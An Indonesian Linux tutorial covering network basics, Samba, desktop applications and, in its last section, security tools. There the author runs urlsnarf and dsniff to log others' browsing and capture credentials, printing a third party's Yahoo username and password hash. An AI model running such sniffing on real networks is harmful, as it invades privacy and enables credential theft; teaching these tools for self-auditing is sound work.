Topologi ring menghubungkan komputer-komputer sepanjang satu lintasan tunggal seperti halnya pada topology bus, namun pada topology ring secara logis masing-masing ujung saling bertemu sehingga membentuk sebuah cincin. Yang perlu digaris bawahi disini adalah bahwa bentuk cincin tersebut hanya dilihat secara logis, jika dilihat secara fisik maka topology ring tidak berbentuk lingkaran sama sekali tetapi lebih lebih mirip topologi star dengan konsentrator ditengahnya. Karakteristik dari topology ring adalah sebagai berikut: • Lingkaran tertutup yang berisi node-node. • Layout sederhana. • Sinyal mengalir dalam satu arah, sehingga colission dapat dihindari. • Jika satu node rusak maka seluruh node dalam jaringan akan ikut tergangggu. • Mahal. Gambar dari topology ring terlihat seperti berikut ini :
105
Copyright © 2007 hhan.wordpress.com
Gambar 7.2 Topology Ring. 7.3
Peralatan Jarigan
Agar masing-masing komputer dapat terhubung dan terbentuk sebuah topology tertentu maka diperlukan peralatan jaringan berupa hardware. Pada sub bab ini akan dibahas beberapa peralatan jaringan yang banyak digunakan saat ini.
7.3.1
Network Interface Card
Network Interface Card (NIC) sering juga disebut Ethernet card, digunakan untuk menghubungkan komputer ke jaringanya. Ethernet dapat berupa card yang ditancapkan pada slot PCI ataupun onboard, saat ini hampir semua komputer telah dilengkapi dengan Ethernet onboard.
106
Copyright © 2007 hhan.wordpress.com
Gambar 7.3 Ethernet card.
7.3.2
Kabel
Kabel merupakan salah satu perangkat yang diperlukan untuk menghubungkan komputer yang satu dengan komputer yang lainya dalam jaringan. Terdapat 3 macam jenis kabel yang digunakan dalam membangun sebuah jaringan komputer, yaitu kebel coaxial, kabel UTP, kabel fiber optik. •
Kabel coaxial
Kabel coaxial biasanya digunakan pada jaringan komputer dengan topology bus. berikut ini merupakan gambar dari sebuah kabel coaxial.
107
Copyright © 2007 hhan.wordpress.com
Gambar 7.4 Kabel Coaxial. Seperti terlihat pada gambar diatas bahwa kabel coaxial terdiri dari 4 bagian. Bagian dari yang paling dalam adalah konduktor, insulator dalam, konduktor luar, insulator luar.
•
Kabel UTP
Pengkabelan UTP untuk sebuah jaringan menggunakan sebuah modul yang disebut dengan RJ (Registered Jack)-45/ RJ-45. yang perlu dipahami disini bahwa tiap 1 kabel UTP terdiri dari 4 buah pairs, tiap pairsnya terdiri dari 2 pilinan, ini berarti bahwa tiap 1 kabel UTP terdiri dari 8 buah kabel kecil didalamnya dengan warna yang berbeda-beda. Berikut ini table warnanya: Pair Warna 1 Biru
Kabel Biru dan biru-putih
108
Copyright © 2007 hhan.wordpress.com 2 3 4
Orange Hijau Coklat
Orange dan orange-putih Hijau dan hijau-putih Coklat dan coklat-putih
Untuk memasang kabel UTP pada sebuah RJ-45 terdapat beberapa standart yaitu 568A dan 568B/258A. terdapat dua jenis konfigurasi kabel UTP yaitu straight-trough dan cross-over. Konfigurasi straight-trough digunakan untuk menghubungkan dua buah device yang berbeda, misalnya komputer dengan switch. Untuk membuat kabel UTP dengan konfigurasi straight-trough, ujung masing-masing kabel harus dipasangkan pada sebuah RJ-45 dengan menggunakan salah satu standart pemasangan kabel yaitu menggunakan standart 568A pada kedua ujungnya atau menggunakan standart 568B pada kedua ujungnya.
Gambar 7.5 Straight-trough. Sedangkan konfigurasi cross-over digunakan untuk menghubungkan dua buah device yang sama, misalnya komputer dengan komputer. Berbeda dengan straight-trough, untuk membuat kabel UTP
109
Copyright © 2007 hhan.wordpress.com dengan konfigurasi cross-over maka kedua ujung kabel harus diapsangkan pada sebuah RJ-45 dengan standart yang berbeda, yaitu, ujung yang satu dipasang dengan standart 568A dan ujung yang satunya lagi harus dipasang dengan standart 568B/258A.
Gambar 7.6 Cross-over
Gambar 7.7 RJ-45 dilihat dari depan dengan sisi menonjol/klip diletakan pada bagian bawah. Standart 568A Standart 568A dibawah ini : Pin 1 2 3 4 5 6 7 8
terlihat
seperti
pada
diagram
Kabel Hijau-putih Hijau Orange-putih Biru Biru-putih Orange Coklat-putih Coklat
110
Copyright © 2007 hhan.wordpress.com
Standart 568B/258A
Table dari standart pengkabelan 568B/258A adalah seperti berikut ini: Pin 1 2 3 4 5 6 7 8 •
Kabel Orange-putih Orange Hijau-putih Biru Biru-putih Hijau Coklat-putih Coklat
Kabel Fiber Optik
Kabel fiber optik merupakan salah satu jenis kabel yang memiliki kemampuan transfer data yang cukup tinggi. Kabel ini sangat baik digunakan dalam jaringan yang membutuhkan transfer rate yang cukup tinggi seperti teleconference, video streaming, dan lainya.
Gambar 7.8 Kabel fiber optik.
111
Copyright © 2007 hhan.wordpress.com Sesuai dengan namanya, kabel serat optik mengunakan sinyal cahaya (fotonik) untuk mengirimlan data. Kelebihan yang utama dari kabel serat optik adalah kecepatanya, selain itu kabel jenis ini hampir tidak memiliki masalah gangguan, seperti gangguan derau elektronik dan lainya.
7.3.3
Repeater, Hub, Bridge dan Switch
Repeater merupakan peralatan jaringan yang berfungsi untuk menerima sinyal kemudian meneruskan kembali sinyal tersebut dengan kekuatan yang sama seperti sinyal tersebut diterima. Dengan menggunakan repeater maka sinyal dari satu komputer dapat iterima oleh komputer lain yang letaknya berjauhan. Sedangkan Hub merupakan peralatan jaringan yang fungsinya sama dengan repeater, hanya saja Hub terdiri dari beberapa port, sehingga Hub disebut juga multiport repeater. Fungsi bridge hampir sama dengan hub, yang membedakanya adalah bahwa bridge bekerja lebih “pintar” dari hub. Bridge bekerja pada lapisan data linksehingga mempunyai kemampuan untuk menggunakan MAC address dalam proses pengiriman frame ke alamat yang dituju. Fungsi dari switch sama dengan fungsi dari bridge, tetapi switch terdiri dari beberapa port sehingga switch disebut juga sebagai multiport bridge.
112
Copyright © 2007 hhan.wordpress.com
Gambar 7.9 Hub dan Switch
7.3.4
Router
Router merupakan peralatan jaringan yang dipakai untuk memperluas jaringan dengan melanjutkan paket-paket dari satu jaringan logika ke jaringan lain. Router bekerja pada lapisan network pada referensi Open System Interconnection/OSI, oleh karena itu router memiliki kemampuan yang lebih “pintar” dari switch yaitu mampu meneruskan paket IP dari satu jaringan ke jaringan yang berbedabaik secara fisik maupun secara logic. Router berisi table-tabel informasi internal yang disebut table routing yang melakukan pencatatan terhadap semua alamat jaringan yang diketahui dan lintasan yang mungkin dilalui. Terdapat dua jenis router yaitu router statis dan router dinamis. Router statis mempunyai table routing yang harus dikonfigurasi secara manual oleh administrator jaringan, sedangkan router dinamis secara otomatis akan membuat table routingnya sendiri dengan memeriksa lalu lintas jaringan.
113
Copyright © 2007 hhan.wordpress.com
Gambar 7.10 Router 7.4
IP Address
IP address merupakan alamat unik yang diberikan pada jaringan komputer dan peralatan jaringan yang menggunakan protokol TCP/IP. Pada IPv4, IP address terdiri atas 32 bit angka biner yang tiap 8 bitnya dipisahlan oleh titik, untuk memudahkan pembacaan serta penulisan maka angka-angka biner tersebut dituliskan sebagai empat kelompok angka desimal yang dipisahkan oleh tanda titik sehingga penulisan IP address akan menjadi seperti berikut ini 192.168.0.1. IP address terdiri atas dua bagian yaitu network ID dan host ID, dimana network ID digunakan untuk menunjukan dimana jaringan komputer tersebut berada, sedangkan host ID menentukan alamat host. Oleh sebab itu IP address memberikan alamat lengkap suatu host beserta alamat jaringan di mana host tersebut berada. 7.4.1 Pembagian IP Address Dalam mempermudah distribusinya IP address dibagi kedalam beberapa kelas, seperti berikut ini:
114
Copyright © 2007 hhan.wordpress.com •
Kelas A Ciri-ciri dari IP kelas A adalah sebagai berikut: Format : 0nnnnnnn.hhhhhhhh.hhhhhhhh.hhhhhhhh Bit pertama :0 Panjang network ID : 8 bit Panjang host ID : 24 bit Byte pertama : 0 – 127 Jumlah : 126 kelas A (0 dan 127 dicadangkan) Range IP : 1.xxx.xxx.xxx sampai 126.xxx.xxx.xxx Jumlah IP : 16.777.214 IP address
•
Kelas B Format : 10nnnnnn.nnnnnnnn.hhhhhhhh.hhhhhhhh Bit pertama : 10 Panjang network ID : 16 bit Panjang host ID : 16 bit Byte pertama : 128 – 191 Jumlah : 16.384 kelas B Range IP : 128.0.xxx.xxx sampai 191.155.xxx.xxx Jumlah IP : 65.532 IP address
•
Kelas C Format : 110nnnnn.nnnnnnnn.nnnnnnnn.hhhhhhhh Bit pertama : 110 Panjang network ID : 24 bit Panjang host ID : 8 bit Byte pertama : 192 – 223 Jumlah : 2.097.152 kelas C Range IP : 192.0.0.xxx sampai 223.255.255.xxx
115
Copyright © 2007 hhan.wordpress.com Jumlah IP
: 254 IP address
•
Kelas D Format : 1110mmmm.mmmmmmmm.mmmmmmmm.mm mmmmmm Bit pertama : 1110 Bit multicast : 28 bit Byte inisial : 224 – 247 Kelas D merupakan ruang alamat multicast
•
Kelas E Format : 1111rrrr.rrrrrrrr.rrrrrrrr.rrrrrrrr Bit pertama : 1111 Bit multicast : 28 bit Byte inisial : 248 – 255 Kelas E dicadangkan untuk experiment.
7.5
keperluan
Seting IP Address
Untuk melakukan seting IP address pada linux anda harus login terlebih dahulu sebagai root. Adapun langkah-langkah untuk setting IP address adalah seperti berikut ini: root@hhan:~# ifconfig –eth0 192.168.0.1 netmask 255.255.255.0
eth0 merupakan device ethernet yang pertama. Untuk melihat konfigurasi IP Address pada Ethernet kita, ketikan perintah berikut ini.
116
Copyright © 2007 hhan.wordpress.com root@hhan:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0 inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:712 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b) Interrupt:5 Base address:0x9800 lo
Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436
Metric:1 RX packets:10 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:500 (500.0 b) TX bytes:500 (500.0
7.6
Mengaktifkan Samba
Samba merupakan implementasi dari SMB protocol yaitu protocol yang digunakan oleh sistem operasi MS seperti MS Windows untuk melakukan sharing file dan printer. Dengan SMB anda bisa mengakses file & printer yang di-share oleh komputer Windows atau men-share file & printer di komputer linux
117
Copyright © 2007 hhan.wordpress.com anda. Untuk mengaktifkan samba terlebih dahulu kita harus melakukan beberapa setting, ketikan perintah berikut ini untuk memulainya. root@hhan:~# smbconf.sh
kemudian akan muncul sebuah window seperti dibawah.
Gambar 7.11 setting samba. Klilk ok, kemudian akan diminta untuk mengisikan nama workgroup.
118
Copyright © 2007 hhan.wordpress.com
Gambar 7.12 setting workgroup. Isikan workgroup anda, kemudian klik ok.
Gambar 7.13 setting windows username. Isikan windows username anda, kemudian klik ok.
119
Copyright © 2007 hhan.wordpress.com
Gambar 7.14 setting password untuk knoppix. Isikan password dan klik ok. Jika berhasil maka akan muncul window seperti berikut.
Gambar 7.15 jendela informasi. Klik ok.
120
Copyright © 2007 hhan.wordpress.com
Gambar 7.16 Setting password administrator. Masukan password untuk administrator dan klik ok. Jika tidak ada yang salah maka akan muncul sebuah jendela informasi seperti berikut ini.
Gambar 7.17 Jendela informasi. Klik ok.
121
Copyright © 2007 hhan.wordpress.com
Gambar 7.18 Sharing directory home. Klik yes jika ingin homedrives anda di-share, klik no jika tidak ingin melakukan sharing.
Gambar 7.19 Sharing printer. Klik yes jika ingin melakukan sharing printer, klik no jika tidak ingin melakukan sharing printer. Jika semua konfigurasi telah selesai maka akan muncul sebuah window seperti berikut ini, klik ok untuk mulai menjalankan daemon samba.
122
Copyright © 2007 hhan.wordpress.com
Gambar 7.20 Jendela informasi bahwa konfigurasi telah selesai dan samba akan mulai dijalankan. Konfigurasi diatas akan meng-generate sebuah file konfigurasi untuk samba yaitu file smb.conf pada direktori /etc/samba/ yang isinya seperti berikut ini. [global] workgroup = skb50 netbios name = box server string = host %h Version %v for %I security = user encrypt passwords = yes map to guest = Bad User username map = /etc/samba/smbusers smb passwd file = /etc/samba/smbpasswd socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192 character set = ISO8859-1 printcap name = cups load printers = yes printing = cups guest ok = yes
Untuk mematikan, restart ataupun start daemon samba dapat dilakukan secara manual dengan perintah seperti berikut ini.
123
Copyright © 2007 hhan.wordpress.com root@1[samba]# smbd stop|start|restart
Pilih salah satu option dari ketiga option diatas sesuai kebutuhan. Misalnya option restart untuk me-restart daemon samba anda. root@1[samba]# smbd restart
7.7
Mengakses File Sharing pada Jaringan
Untuk mengakses file yang disharing pada jaringan, kita dapat menggunakan tool yang disertakan pada linux auditor security yaitu smb4k. ketikan perintah berikut ini untuk memulainya. root@hhan:~# smb4k
Kemudian akan muncul sebuah icon kecil pada bagian pojok kanan taskbar. Klik untuk mengaktifkanya.
Gambar 7.21 Icon smb4k Setelah icon tersebut anda klik maka anda akan dihadapkan pada jendela smb4k seperti berikut.
124
Copyright © 2007 hhan.wordpress.com
Gambar 7.22 Jendela utama smb4k.
125
Copyright © 2007 hhan.wordpress.com
BAB 8 APLIKASI PADA LINUX AUDITOR SECURITY
8.1
Grafik ,Multimedia, Viewer dan Emulator
8.1.1 Gimp Gimp merupakan program pengolah grafik yang disertakan pada linux auditor security. Untuk memulai penggunakan gimp klik: Start menu Æ Applications ÆGraphichs Æ Image editor (Gimp image editor)
Gambar 8.1 Memulai menjalankan Gimp
126
Copyright © 2007 hhan.wordpress.com Pada saat pertama kali menjalankanya gimp akan meminta anda untuk menginstallnya terlabih dahulu. Untuk memulai instalasi Gimp klik kontinu sebanyak 5 kali.
Gambar 8.2 Proses instalasi Gimp Jika berhasil maka akan muncul sebuah informasi seperti berikut ini
Gambar 8.3 Setelah proses instalasi Gimp selesai
127
Copyright © 2007 hhan.wordpress.com Setelah muncul informasi seperti diatas klik close dan akan ditampilkan area kerja gimp seperti berikut:
Gambar 8.4 Area kerja Gimp Membuka image file Gimp dapat digunakan untuk membuka beberapa tipe image file diantaranya adalah image file yang bertipe sebagai berikut : bmp, cel, dicom, FITS, FLI, Fax G3, GBR GIF, GIH, Gicon, HRZ, Jpeg, PAT, PCX, PIX, PNG, PNM, PSD, PSP, Postscript, SGI, Sunras, TGA, TIFF, URL, WMF, XBM, XWD, Xpm, Bzip2, Gzip dan xjt. Untuk membuka sebuah image file caranya adalah : klik file Æ open
128
Copyright © 2007 hhan.wordpress.com
Gambar 8.5 Membuka sebuah image file Setelah memilih image file kemudian klik ok untuk membukanya. Jika berhasil maka akan muncul gambar sebagai berikut:
129
Copyright © 2007 hhan.wordpress.com Gambar 8.6 Sebuah file JPG dibuka dengan Gimp Menambahkan text Untuk menambahkan text pada image file yang telah dibuka caranya adalah tekan "t" atau klik icon "T".
Gambar 8.7 Icon untuk menambahkan sebuah text Kemudian tulis text yang ingin anda tambahkan dan klik close jika sudah selesai. Untuk mengatur font dan size anda dapat mengaturnya pada "text options".
130
Copyright © 2007 hhan.wordpress.com
Gambar 8.8 Icon untuk mengatur text Menambah layer baru Layer digunakan untuk memudahkan mengedit suatu image. Dengan menggunakan layer-layer maka kita dapat menambahkan sebuah text ataupun gambar lainya pada gambar yang sebelumnya telah dibuka tanpa menindih gambar yang lama. Untuk menambahkan sebuah layer baru anda dapat memulainya dengan klik icon new layer.
131
Copyright © 2007 hhan.wordpress.com
Gambar 8.9 Icon untuk menambahkan sebuah layer baru kemudian akan muncul sebuah layer baru dengan nama "empty layer".
Gambar 8.10 Layer baru telah ditambahkan
132
Copyright © 2007 hhan.wordpress.com Menambahkan gambar pada layer baru Untuk menambahkan sebuah gambar pada layer baru caranya adalah aktifkan layer baru dengan cara klik layer baru tersebut. Klik icon paint brush atau tekan "p" kemudian pilih model brush yg ingin ditambahkan.
Gambar 8.11 Memilih model brush Setelah berhasil maka image akan menjadi seperti berikut ini.
133
Copyright © 2007 hhan.wordpress.com
Gambar 8.12 Hasil akhir Menyimpan file Setelah proses editing selesai maka untuk menyimpan file hasil editing tersebut caranya adalah sebagai berikut: klik file kemudian save as.
134
Copyright © 2007 hhan.wordpress.com
Gambar 8.13 Panyimpanan hasil editing 8.1.2 Screen Capture Program (Ksnapshot) Ksnapshot merupakan sebuah program yang disertakan pada linux auditor security yang digunakan untuk meng-capture sebuah aktivitas pada desktop dan menyimpanya ke dalam file image. Untuk memulainya langkah-langkahnya adalah sebagai berikut: klik start menu Æ Applications Æ Graphics Æ Screen Capture Program (KSnapshot)
135
Copyright © 2007 hhan.wordpress.com
Gambar 8.14 memulai KSnapshot Pada program capturing yaitu: • • •
KSnapshot
terdapat
3
mode
Full Screen, jika ingin melakukan capture seluruh layer pada desktop, termasuk taskbar. Window Under Cursor, jika ingin melakukan capture pada sebuah window yang diinginkan saja. Region, jika ingin melakukan capture untuk mendapatkan warnanya saja.
Options “snapshot delay” digunakan untuk memberikan delay waktu dari mulai tombol "new snapshot" ditekan sampai objek yang ingin di capture disiapkan.
136
Copyright © 2007 hhan.wordpress.com
Gambar 8.15 Program KSnapshot yang telah dijalankan 8.1.3 PDF Viewer (KPDF) KPDF merupakan sebuah aplikasi yang disertakan pada linux auditor security yang berfungsi untuk membuka sebuah file PDF. Untuk memulai penggunakan KPDF caranya adalah : klik Start menu Æ Applications Æ Graphics Æ PDF Viewer (KPDF)
137
Copyright © 2007 hhan.wordpress.com
Gambar 8.16 memulai KPDF Setelah itu akan muncul sebuah aplikasi seperti berikut ini:
Gambar 8.17 Tampilan program KPDF Untuk membuka sebuah file PDF caranya adalah : klik file Æ Open kemudian tentukan file PDF yang ingin anda buka, dan klik open sekali lagi untuk
138
Copyright © 2007 hhan.wordpress.com membukanya, sehingga seperti berikut :
akan
didapatkan
hasil
Gambar 8.18 File PDF yang dibuka dengan KPDF Untuk memperbesar ukuran text klik view > zoom in atau tekan Ctrl++, sedangkan untuk memperkecil ukuran text klik view > zoom out atau tekan Ctrl+-. 8.1.4 XMMS (X Multimedia System) XMultimedia System atau XMMS merupakan sebuah program audio player yang disertakan pada linux auditor security. XMMS memiliki tampilan dan fungsi-fungsi yang sama persis dengan winamp pada windows. Untuk menjalankan XMMS ketik perintah berikut ini pada console : root@hhan:~# xmms
139
Copyright © 2007 hhan.wordpress.com
Gambar 8.19 Program XMMS Mengatur Preset Equaliser Option presets digunakan untuk melakukan setting equalizer, kita dapat mengambil seting equalizer dari winamp yang telah kita install pada system operasi windows. Adapun langkah-langkahnya adalah sebagai berikut: -
Lakukan mounting drive c windows anda. root@hhan:~# mount /mnt/hda1
-
Klik preset Æ import Æ winamp preset. Cari letak direktori winamp anda.
140
Copyright © 2007 hhan.wordpress.com
Gambar 8.20 Melakukan setting preset - klik "Winamp.q1" Æ ok Sekarang preset equaliser winamp telah diload pada preset xmms anda, untuk menggunakanya langkahnya adalah sebagai berikut: - Klik preset Æ load Æ preset - Pilih preset equaliser yang anda inginkan, misalnya "Soft Rock". - klik ok Option-option Perintah xmms
141
Copyright © 2007 hhan.wordpress.com Berikut ini adalah option-option untuk perintah xmms yang dapat anda ikut sertakan pada saat eksekusi xmms. -h, --help Show summary of options. -n, --session Select XMMS session (Default: 0). -r, --rew Skip backwards in playlist. -p, --play Start playing current playlist. -u, --pause Pause current song. -s, --stop Stop current song. -t, --play-pause Pause if playing, play otherwise. -f, --fwd Skip forward in playlist. -e, --enqueue Don't clear the playlist. -m, --show-main-window Show the main window. -v, --version Print version number and exit.
142
Copyright © 2007 hhan.wordpress.com
Keybindings (shorcuts/navigasi) untuk XMMS Berikut ini adalah shortcut-shorcut navigasi untuk XMMS. z x c v b l j r s Shift + Control Control Control plugin dialog Control Control Control Control Control Control Control Control Advance Control Control winshade mode Shift + mode Alt + w mainwindow Alt + e playlistwindow
l + l + p + v
Previous song Play Pause Stop Next song Play file Jump to file Toggle Repeat Toggle Shuffle Play directory Play location Preferences dialog Visualization
+ + + + + + + +
Time remaining Always on top Winshade mode Doublesize mode Easy move Jump to time Start of list No Playlist
r a w d e j z n
+ 3 + Alt + w
File info dialog Toggle Equalizer
Control + w Playlist winshade Hide/show Hide/show
143
Copyright © 2007 hhan.wordpress.com Alt + g Equalizer Alt + s window
Hide/show Skin selecting
Main window specific: Arrow key Arrow key Arrow key forward in song Arrow key back in song
up down right
Volume up 2% Volume down 2% Skip 5 seconds
left
Skip 5 seconds
Playlist window specific: Arrow key up
Up one step in
Arrow key down
Down one step in
playlist playlist Delete songs from playlist Page Up Page Down Home playlist Enter Insert Shift + Insert dialog Alt + Insert
Remove selected Move one page up Move one page down First page in Play selected song Add file dialog Add directory Add url dialog
Equalizer shade mode specific: Arrow key up Arrow key down Arrow key right
Volume up 2% Volume down 2% Balance 4% to
Arrow key left
Balance 4% to left
right
144
Copyright © 2007 hhan.wordpress.com
8.1.5 WINE (Windows Emulator) Wine (Windows Emulator) adalah sebuah emulator yang digunakan untuk menjalankan programprogram bawaan windows pada sistem operasi linux. Dengan menggunakan wine kita dapat menjalankan file-file eksekusi windows yang biasanya berekstensi "exe" pada sistem operasi linux kita. Untuk menjalankan wine langkahnya adalah sebagai berikut (dalam hal ini penulis ingin menjalankan game Game Perfect ChessMate) : - Ketik perintah berikut ini: hhan@hhan:/mnt/hda5/fun/Chess$ wine chess.exe
Jika ini adalah pertama kalinya anda mnjalankan wine maka anda akan diminta untuk melakukan konfigurasi wine terlebih dahulu.
145
Copyright © 2007 hhan.wordpress.com
Gambar 8.21 Eksekusi wine untu yang pertama kalinya. -
Klik Configure Wine untuk melakukan konfigurasi, kemudian akan muncul gbr seperti berikut.
Gambar 8.22 Langkah I konfigurasi Wine -
Biarkan pilihan default, kemudian klik next
146
Copyright © 2007 hhan.wordpress.com
Gambar 8.23 Langkah II konfigurasi Wine
-
Biarkan pilihan default, wine akan melakukan autodetect lokasi dari paartisi windows anda. Klik next
Gambar 8.24 Langkah III konfigurasi Wine -
Klik finish
147
Copyright © 2007 hhan.wordpress.com Setelah konfigurasi selesai maka file “Chess.exe“ akan dieksekusi dan hasilnya adalah seperti berikut:
Gambar 8.25 Game Perfect ChessMate yang dijalankan dengan Wine 8.2
Aplikasi Security
Seperti yang penulis pernah bahas pada “http://jasakom.com/article.aspx?ID=740” bahwa menurut penciptanya yang dituliskan pada “http://remote-exploit.org” , linux Auditor Security diciptakan untuk memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan yang user friendly. Program – program open source pada auditor security menawarkan toolset yang komplit untuk meng-analysis keamanan sebuah system, byte per
148
Copyright © 2007 hhan.wordpress.com byte. Dalam buku ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security. Penulis sangat mengaharapkan anda mencobanya pada sistem komputer milik Anda sendiri, sehingga diharapakan nantinya anda dapat menganalisa dan mengamankan system anda. Yang perlu diingat disini adalah bahwa tindakan memasuki sistem pihak lain tanpa ijin adalah ilegal dan anda bisa dituntut secara pidana, tentu saja penulis tidak mengharapkan hal tersebut terjadi. 8.2.1 Grabbing URL Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC pada jaringan lokal yang terhubung dengan internet. 8.2.1.1
Grabbing URL Pada Channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XChat yang telah tersedia secara bult-in pada linux auditor. Untuk menjalankan XChat langkahnya adalah klik : start menu > appllications > internet > instant messaging > XChat IRC
149
Copyright © 2007 hhan.wordpress.com
Gambar 8.26 Memulai XChat. Kemudian akan muncul sebuah window yang meminta kita untuk memasukan beberapa setting awal, seperti berikut ini :
150
Copyright © 2007 hhan.wordpress.com
Gambar 8.27 Setting awal XChat Sebelum melakukan grabbing, Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah. Berikut ini hasil grabbing
151
Copyright © 2007 hhan.wordpress.com URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung pada server dalnet tanggal 1 September 2005. ftp.orghttp://echo.or.id http://irc.jraxis.com/dalnet/default/ http://kline.dal.net/exploits/akills.htm#ma http://kline.dal.net/exploits/akills.htm#ma))) http://kline.dal.net/massads/mup.htm http://kline.dal.net/proxy/ http://miranda-im.org http://tiongkokmusic.com:2222/listen.pls http://unut.hollosite.com http://valueshells.com http://valueshells.com/disc.html http://www.dal.net/ http://www.dal.net/aup/ http://www.equinix.net http://www.kecoak.or.id http://www.malanghack.net/ http://www.rayofshadow.or.id http://www.valueshells.com irc.hackerszone.orgirc.vsnl.com www.balihack.or.idwww.bandung-dal.net WwW.BaNdUnG.tKwww.dal.net/proxies www.jraxis.comwww.malanghack.net WwW.PsYcHoPeD.InFowww.scoopsite.com www.superask.netwww.VALUESHELLS.com www.ValueShells.comwww.valueshells.com www.valueshells.comwww.w0nk.org www.zoneh.org/en/defacements/mirror/id=2840693/> www.zoneh.org/en/defacements/mirror/id=2840696/>
152
Copyright © 2007 hhan.wordpress.com Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel – channel diatas. Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi oleh masing-masing chatter. 8.2.1.2 Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut pada konsole : hhan@hhan:~# urlsnarf -i eth0 > ./grabMeBabe.txt
Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing keesokan hari. Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 AM sampai 06:21:10 AM pada tanggal 02/Sep/2005. 192.168.0.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?la stact=approve&sc=933 HTTP/1.1" - "http://www.friendster.com/friendrequests.php?s
153
Copyright © 2007 hhan.wordpress.com tatpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"
Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.0.5 pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses sebuah situs yaitu www.friendster.com dan kemungkinan besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah Mozzila/5.0 dengan mamakai sistem operasi linux. 8.2.2 Sniffing Menggunakan DSNIFF Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan meng-capture paket – paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya yang dianggap penting. Dsniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security. Untuk memulai sniffing ketikan perintah berikut ini: hhan@hhan:~# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db
Perintah diatas akan memerintahkan Dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya pada sebuah file dengan nama
154
Copyright © 2007 hhan.wordpress.com passwd_HhAN.db yang disimpan pada directory /mnt/hda5/. Untuk membaca hasilnya gunakan perintah berikut ini: hhan@hhan:~# dsniff -r /mnt/hda5/passwd_HhAN.db
Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows, ketik perintah berikut : hhan@hhan:~# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt
Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan : 09/02/05 04:58:42 tcp 192.168.0.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET /reg/login1/newym_nouc/lisu/login/us/ym/*http:/ /login.yahoo.com/config/login?.tries=1&.src=ym& .md5=&.hash=&.js=1&. last=&promo=&.intl=us&.bypass=&.partner=&.u=b26 1flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy 0vhTsQz0&.yplus=&. emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y& .done=http%3A//mail.yahoo.com&login=hyraxz &passwd=ace61b359fa543aceccf111dbd767e74&.persi stent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com
155
Copyright © 2007 hhan.wordpress.com Berikut analysis dari hasil sniffing di atas: 1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan IP 192.168.0.7 port 1183 dengan server yahoo pada p2.rd.scd.yahoo.com port 80 denagan memakai protokol HTTP. 2. User Name untuk login ke server e-mail dari user tersebut adalah hyraxz dengan password hasil enkripsi MD5 “ace61b359fa543aceccf111dbd767e74” (tanpa tanda petik). 3. Server mail yahoo menggunakan methode enkripsi MD5. 8.2.3 Mengubah MAC Address MAC (Medium Access Control ) Address merupakan alamat unik yang diberikan pada tiap Ethernet yang diproduksi. MAC Address dituliskan dalam bentuk yang mudah untuk dimengerti manusia, yaitu berupa urutan enam angka yang dipisahkan oleh titik dua. Tiap angka berkoresponden dengan 1 byte dari keseluruhan 6 byte alamat, dan direpresentasikan dalam bentuk hexadecimal (1 digit untuk tiap 4 bit). Sebagai contoh, 00:E0:18:F3:9A:D0 merupakan representasi yang lebih mudah dibaca dari alamat Ethernet : 00000000 : 11100000 : 00011000 : 11110011 : 